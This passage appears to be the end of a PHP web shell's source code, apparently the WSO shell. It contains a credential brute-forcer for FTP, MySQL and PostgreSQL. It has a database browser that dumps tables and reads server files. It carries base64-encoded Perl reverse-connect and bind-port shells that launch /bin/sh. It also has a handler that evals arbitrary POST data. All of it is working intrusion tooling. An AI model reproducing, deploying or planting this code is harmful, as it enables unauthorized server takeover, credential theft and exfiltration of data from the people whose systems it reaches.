3179 function bruteForce($ip,$port,$login,$pass) {
3180 $fp = @ftp_connect($ip, $port?$port:21);
3181 if(!$fp) return false;
3182 $res = @ftp_login($fp, $login, $pass);
3183 @ftp_close($fp);
3184 return $res;
3185 }
3186 } elseif( $_POST['proto'] == 'mysql' ) {
3187 function bruteForce($ip,$port,$login,$pass) {
3188 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3189 @mysql_close($res);
3190 return $res;
3191 }
3192 } elseif( $_POST['proto'] == 'pgsql' ) {
3193 function bruteForce($ip,$port,$login,$pass) {
3194 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3195 $res = @pg_connect($str);
3196 @pg_close($res);
3197 return $res;
3198 }
3199 }
3200 $success = 0;
3201 $attempts = 0;
3202 $server = explode(":", $_POST['server']);
3203 if($_POST['type'] == 1) {
3204 $temp = @file('/etc/passwd');
3205 if( is_array($temp) )
3206 foreach($temp as $line) {
3207 $line = explode(":", $line);
3208 ++$attempts;
3209 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
3210 $success++;
3211 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
3212 }
3213 if(@$_POST['reverse']) {
3214 $tmp = "";
3215 for($i=strlen($line[0])-1; $i>=0; --$i)
3216 $tmp .= $line[0][$i];
3217 ++$attempts;
3218 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
3219 $success++;
3220 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
3221 }
3222 }
3223 }
3224 } elseif($_POST['type'] == 2) {
3225 $temp = @file($_POST['dict']);
3226 if( is_array($temp) )
3227 foreach($temp as $line) {
3228 $line = trim($line);
3229 ++$attempts;
3230 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
3231 $success++;
3232 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
3233 }
3234 }
3235 }
3236 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
3237 }
3238 echo '<center><h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
3239 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
3240 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
3241 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
3242 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
3243 .'<span>Server:port</span></td>'
3244 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
3245 .'<tr><td><span>Brute type</span></td>'
3246 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
3247 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
3248 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
3249 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
3250 .'<td><input type=text name=login value="root"></td></tr>'
3251 .'<tr><td><span>Dictionary</span></td>'
3252 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
3253 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
3254 echo '</div><br>';
3255 wsoFooter();
3256}
3257
3258function actionSql() {
3259 class DbClass {
3260 var $type;
3261 var $link;
3262 var $res;
3263 function DbClass($type) {
3264 $this->type = $type;
3265 }
3266 function connect($host, $user, $pass, $dbname){
3267 switch($this->type) {
3268 case 'mysql':
3269 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
3270 break;
3271 case 'pgsql':
3272 $host = explode(':', $host);
3273 if(!$host[1]) $host[1]=5432;
3274 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
3275 break;
3276 }
3277 return false;
3278 }
3279 function selectdb($db) {
3280 switch($this->type) {
3281 case 'mysql':
3282 if (@mysql_select_db($db))return true;
3283 break;
3284 }
3285 return false;
3286 }
3287 function query($str) {
3288 switch($this->type) {
3289 case 'mysql':
3290 return $this->res = @mysql_query($str);
3291 break;
3292 case 'pgsql':
3293 return $this->res = @pg_query($this->link,$str);
3294 break;
3295 }
3296 return false;
3297 }
3298 function fetch() {
3299 $res = func_num_args()?func_get_arg(0):$this->res;
3300 switch($this->type) {
3301 case 'mysql':
3302 return @mysql_fetch_assoc($res);
3303 break;
3304 case 'pgsql':
3305 return @pg_fetch_assoc($res);
3306 break;
3307 }
3308 return false;
3309 }
3310 function listDbs() {
3311 switch($this->type) {
3312 case 'mysql':
3313 return $this->query("SHOW databases");
3314 break;
3315 case 'pgsql':
3316 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
3317 break;
3318 }
3319 return false;
3320 }
3321 function listTables() {
3322 switch($this->type) {
3323 case 'mysql':
3324 return $this->res = $this->query('SHOW TABLES');
3325 break;
3326 case 'pgsql':
3327 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
3328 break;
3329 }
3330 return false;
3331 }
3332 function error() {
3333 switch($this->type) {
3334 case 'mysql':
3335 return @mysql_error();
3336 break;
3337 case 'pgsql':
3338 return @pg_last_error();
3339 break;
3340 }
3341 return false;
3342 }
3343 function setCharset($str) {
3344 switch($this->type) {
3345 case 'mysql':
3346 if(function_exists('mysql_set_charset'))
3347 return @mysql_set_charset($str, $this->link);
3348 else
3349 $this->query('SET CHARSET '.$str);
3350 break;
3351 case 'pgsql':
3352 return @pg_set_client_encoding($this->link, $str);
3353 break;
3354 }
3355 return false;
3356 }
3357 function loadFile($str) {
3358 switch($this->type) {
3359 case 'mysql':
3360 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
3361 break;
3362 case 'pgsql':
3363 $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
3364 $r=array();
3365 while($i=$this->fetch())
3366 $r[] = $i['file'];
3367 $this->query('drop table wso2');
3368 return array('file'=>implode("\n",$r));
3369 break;
3370 }
3371 return false;
3372 }
3373 function dump($table, $fp = false) {
3374 switch($this->type) {
3375 case 'mysql':
3376 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
3377 $create = mysql_fetch_array($res);
3378 $sql = $create[1].";\n";
3379 if($fp) fwrite($fp, $sql); else echo($sql);
3380 $this->query('SELECT * FROM `'.$table.'`');
3381 $head = true;
3382 while($item = $this->fetch()) {
3383 $columns = array();
3384 foreach($item as $k=>$v) {
3385 if($v == null)
3386 $item[$k] = "NULL";
3387 elseif(is_numeric($v))
3388 $item[$k] = $v;
3389 else
3390 $item[$k] = "'".@mysql_real_escape_string($v)."'";
3391 $columns[] = "`".$k."`";
3392 }
3393 if($head) {
3394 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
3395 $head = false;
3396 } else
3397 $sql = "\n\t,(".implode(", ", $item).')';
3398 if($fp) fwrite($fp, $sql); else echo($sql);
3399 }
3400 if(!$head)
3401 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
3402 break;
3403 case 'pgsql':
3404 $this->query('SELECT * FROM '.$table);
3405 while($item = $this->fetch()) {
3406 $columns = array();
3407 foreach($item as $k=>$v) {
3408 $item[$k] = "'".addslashes($v)."'";
3409 $columns[] = $k;
3410 }
3411 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
3412 if($fp) fwrite($fp, $sql); else echo($sql);
3413 }
3414 break;
3415 }
3416 return false;
3417 }
3418 };
3419 $db = new DbClass($_POST['type']);
3420 if(@$_POST['p2']=='download') {
3421 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
3422 $db->selectdb($_POST['sql_base']);
3423 switch($_POST['charset']) {
3424 case "Windows-1251": $db->setCharset('cp1251'); break;
3425 case "UTF-8": $db->setCharset('utf8'); break;
3426 case "KOI8-R": $db->setCharset('koi8r'); break;
3427 case "KOI8-U": $db->setCharset('koi8u'); break;
3428 case "cp866": $db->setCharset('cp866'); break;
3429 }
3430 if(empty($_POST['file'])) {
3431 ob_start("ob_gzhandler", 4096);
3432 header("Content-Disposition: attachment; filename=dump.sql");
3433 header("Content-Type: text/plain");
3434 foreach($_POST['tbl'] as $v)
3435 $db->dump($v);
3436 exit;
3437 } elseif($fp = @fopen($_POST['file'], 'w')) {
3438 foreach($_POST['tbl'] as $v)
3439 $db->dump($v, $fp);
3440 fclose($fp);
3441 unset($_POST['p2']);
3442 } else
3443 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
3444 }
3445 wsoHeader();
3446 echo "
3447<center>
3448<h1>Sql browser</h1><div class=content>
3449<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
3450<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
3451<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
3452<td><select name='type'><option value='mysql' ";
3453 if(@$_POST['type']=='mysql')echo 'selected';
3454echo ">MySql</option><option value='pgsql' ";
3455if(@$_POST['type']=='pgsql')echo 'selected';
3456echo ">PostgreSql</option></select></td>
3457<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
3458<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
3459<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
3460 $tmp = "<input type=text name=sql_base value=''>";
3461 if(isset($_POST['sql_host'])){
3462 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
3463 switch($_POST['charset']) {
3464 case "Windows-1251": $db->setCharset('cp1251'); break;
3465 case "UTF-8": $db->setCharset('utf8'); break;
3466 case "KOI8-R": $db->setCharset('koi8r'); break;
3467 case "KOI8-U": $db->setCharset('koi8u'); break;
3468 case "cp866": $db->setCharset('cp866'); break;
3469 }
3470 $db->listDbs();
3471 echo "<select name=sql_base><option value=''></option>";
3472 while($item = $db->fetch()) {
3473 list($key, $value) = each($item);
3474 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
3475 }
3476 echo '</select>';
3477 }
3478 else echo $tmp;
3479 }else
3480 echo $tmp;
3481 echo "</td>
3482
3483 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
3484 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
3485 </tr>
3486 </table>
3487 <script>
3488 s_db='".@addslashes($_POST['sql_base'])."';
3489 function fs(f) {
3490 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
3491 if(f.p1) f.p1.value='';
3492 if(f.p2) f.p2.value='';
3493 if(f.p3) f.p3.value='';
3494 }
3495 }
3496 function st(t,l) {
3497 d.sf.p1.value = 'select';
3498 d.sf.p2.value = t;
3499 if(l && d.sf.p3) d.sf.p3.value = l;
3500 d.sf.submit();
3501 }
3502 function is() {
3503 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
3504 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
3505 }
3506 </script>";
3507 if(isset($db) && $db->link){
3508 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
3509 if(!empty($_POST['sql_base'])){
3510 $db->selectdb($_POST['sql_base']);
3511 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
3512 $tbls_res = $db->listTables();
3513 while($item = $db->fetch($tbls_res)) {
3514 list($key, $value) = each($item);
3515 if(!empty($_POST['sql_count']))
3516 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
3517 $value = htmlspecialchars($value);
3518 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
3519 }
3520 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
3521 if(@$_POST['p1'] == 'select') {
3522 $_POST['p1'] = 'query';
3523 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
3524 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
3525 $num = $db->fetch();
3526 $pages = ceil($num['n'] / 30);
3527 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
3528 echo " of $pages";
3529 if($_POST['p3'] > 1)
3530 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
3531 if($_POST['p3'] < $pages)
3532 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
3533 $_POST['p3']--;
3534 if($_POST['type']=='pgsql')
3535 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
3536 else
3537 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
3538 echo "<br><br>";
3539 }
3540 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
3541 $db->query(@$_POST['p2']);
3542 if($db->res !== false) {
3543 $title = false;
3544 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
3545 $line = 1;
3546 while($item = $db->fetch()) {
3547 if(!$title) {
3548 echo '<tr>';
3549 foreach($item as $key => $value)
3550 echo '<th>'.$key.'</th>';
3551 reset($item);
3552 $title=true;
3553 echo '</tr><tr>';
3554 $line = 2;
3555 }
3556 echo '<tr class="l'.$line.'">';
3557 $line = $line==1?2:1;
3558 foreach($item as $key => $value) {
3559 if($value == null)
3560 echo '<td><i>null</i></td>';
3561 else
3562 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
3563 }
3564 echo '</tr>';
3565 }
3566 echo '</table>';
3567 } else {
3568 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
3569 }
3570 }
3571 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
3572 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
3573 echo htmlspecialchars($_POST['p2']);
3574 echo "</textarea><br/><input type=submit value='Execute'>";
3575 echo "</td></tr>";
3576 }
3577 echo "</table></form><br/>";
3578 if($_POST['type']=='mysql') {
3579 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
3580 if($db->fetch())
3581 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
3582 }
3583 if(@$_POST['p1'] == 'loadfile') {
3584 $file = $db->loadFile($_POST['p2']);
3585 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
3586 }
3587 } else {
3588 echo htmlspecialchars($db->error());
3589 }
3590 echo '</div>';
3591 wsoFooter();
3592}
3593function actionNetwork() {
3594 wsoHeader();$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQokc3lzdGVtPSAnZWNobyAiYHVuYW1lIC1hYCI7JzsNCiRzeXN0ZW0xPSAnZWNobyAiYGlkYCI7JzsNCiRzeXN0ZW0yPSAnZWNobyAiYHB3ZGAiOyc7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpwcmludCAiWyBKaWpsZTMgU2hlbGwgfCBDb2RlZCBCeSBQaGVub21lbmUgRHogXVxuIjsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuIFsrXSBQaGVub21lbmUgRHogW01hcnR5cnMgQ3Jld10gQmFjay1Db25uZWN0IFsrXVxuIjsNCnByaW50ICJcblsrXSBCaXNtIEFsbGFoIFsrXVxuIjsNCnByaW50ICJcblN5c3RlbSA+ICI7IA0Kc3lzdGVtKCRzeXN0ZW0pOw0KcHJpbnQgIlxuUGVybWlzc2lvbiA+ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkRpcmVjdG9yeSA+ICI7IA0Kc3lzdGVtKCRzeXN0ZW0yKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7==";$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
3595 echo "<h1>Back Connect</h1><div class=content><form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"><span>Bind port to /bin/sh [perl]</span><br/>Port: <input type='text' name='port' value='21'> <input type=submit value='>>'></form><form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>Back-connect [perl]</span><br/>Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='21'> <input type=submit value='>>'></form><br>";
3596if(isset($_POST['p1'])) {function cf($f,$t) {$w = @fopen($f,"w") or @function_exists('file_put_contents');if($w){@fwrite($w,@base64_decode($t));@fclose($w);}}if($_POST['p1'] == 'bpp') {cf("/tmp/bp.pl",$bind_port_p);
3597 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
3598 sleep(1);
3599 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
3600 unlink("/tmp/bp.pl");
3601 }
3602 if($_POST['p1'] == 'bcp') {
3603 cf("/tmp/bc.pl",$back_connect_p);
3604 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
3605 sleep(1);
3606 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
3607 unlink("/tmp/bc.pl");
3608 }
3609 }
3610 echo '</div>';
3611 wsoFooter();
3612}
3613function actionRC() {
3614 if(!@$_POST['p1']) {
3615 $a = array(
3616 "uname" => php_uname(),
3617 "php_version" => phpversion(),
3618 "wso_version" => WSO_VERSION,
3619 "safemode" => @ini_get('safe_mode')
3620 );
3621 echo serialize($a);
3622 } else {
3623 eval($_POST['p1']);
3624 }
3625}
3626if( empty($_POST['a']) )
3627 if(isset($default_action) && function_exists('action' . $default_action))
3628 $_POST['a'] = $default_action;
3629 else
3630 $_POST['a'] = 'Home';
3631if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
3632 call_user_func('action' . $_POST['a']);
3633exit;
3634?>